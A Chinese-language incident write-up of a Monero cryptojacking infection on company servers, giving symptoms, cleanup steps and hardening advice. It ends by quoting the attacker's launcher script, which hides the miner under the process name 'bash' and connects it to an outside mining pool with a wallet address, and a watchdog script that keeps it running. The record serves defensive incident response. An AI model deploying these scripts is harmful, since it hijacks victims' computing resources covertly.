服務器安全

早上。
開發反應對外客戶服務器環境異常
空間存儲異常 90個G的空間莫名其妙少了70個G
TOP進程異常 多了一個MD和一個BASH為名的進程 分別跑了90-110的cpu
感覺像是系統正常進程 由於剛進公司對業務不了解 所以問了開發 開發表示不是正常業務程序，所以百度了進程中的IP地址。發現是一個常見的挖礦入侵IP，根據入侵IP百度得知是門羅幣挖礦程序。

根據PID找到該進程
[root@bogon ~]# ps -ef|grep 46413
root 46413 1 99 Jan08 ? 56-04:22:04 -bash -a cryptonight -o stratum+tcp://198.251.81.82:3333 -u 49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs -p x

root 80119 79985 0 10:06 pts/1 00:00:00 grep 46413
[root@bogon ~]# ps -ef|grep 47002
root 47002 1 95 Jan08 ? 53-22:30:57 bash -c 1 -t 2 -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:[email protected]:3333/xmr

根據之前遭遇過比特幣挖礦程序入侵案例處理經驗，首先Kill掉這兩個進程，然後查看定時任務中的陌生任務並做清理 清理完成後 存儲空間恢復正常 CPU恢復正常

第二天會再次查看 如果進程再次出現，根據其他挖礦程序處理經驗：找出執行文件取消執行授權 ，刪掉文件， 清理進程，清理定時任務 （操作順序不要亂）
如果還是異常 清理掉文件後 更換root密碼 開啟防火墻對入侵Ip做限制 找出其入侵方式並做相對防禦

當天下午記錄：出現這種問題最好排查整個網段的機器 這次的程序入侵就在整個網段的機器中都發現了 都做了清理

如果還想做安全防禦方面的工作:除了開啟防火墻更換root密碼外
還可以 排查陌生用戶賬號密碼 針對入侵方式做研究（是業務程序有漏洞還是用的服務工具有漏洞） 避免再次被入侵

以下是這個程序涉及的腳本文件供參考（說實話Low的一B）
腳本一：vim ./run

#!/bin/bash

proc=nproc
ARCH=uname -m
HIDE=”bash”

if [ “$ARCH” == “i686” ]; then
./h32 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:[email protected]:3333/xmr >>/dev/null &
elif [ “$ARCH” == “x86_64” ]; then
./h64 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs:[email protected]:3333/xmr >>/dev/null &
fi
echo $! > bash.pid

腳本二：vim /tmp/hsperfdata_data_root/upd
#!/bin/sh
if test -r /tmp/hsperfdata_data_root/bash.pid; then
pid=$(cat /tmp/hsperfdata_data_root/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
./run &>/dev/null

服務器遭遇挖礦程序入侵後的處理